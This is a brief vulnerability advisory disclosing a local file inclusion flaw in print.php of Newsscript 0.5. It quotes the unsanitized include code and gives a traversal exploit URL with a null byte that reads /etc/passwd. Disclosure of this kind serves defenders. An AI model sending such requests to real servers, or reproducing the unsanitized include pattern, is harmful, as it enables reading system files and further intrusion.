# Subject:

--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "

# Vulnerable version:

--- "Newsscript version 0.5"



# Vendor URL:

--- Emaill - mail@webmaster-journal.com
--- Website - http://webmaster-journal.com



# Available in:

---http://www.comscripts.com/scripts/php.wm-news.203.html



# Vulnerability:

--- Vulnerable code in print/print.php

--- $ide var is not sanitized and can be used to include files from local resources

--- 1	    <html>
--- 2	    <head>
--- 3	    <?
--- 4         $file_name = "../".$ide.".txt";
--- 5	    ?>
--- 
---
--- 27	     include($file_name);



# Exploit:

--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00



# Discovered By:

--- Daftrix[at]Gmail.com
--- Daftrix Security Investigations
--- http://www.daftrix.com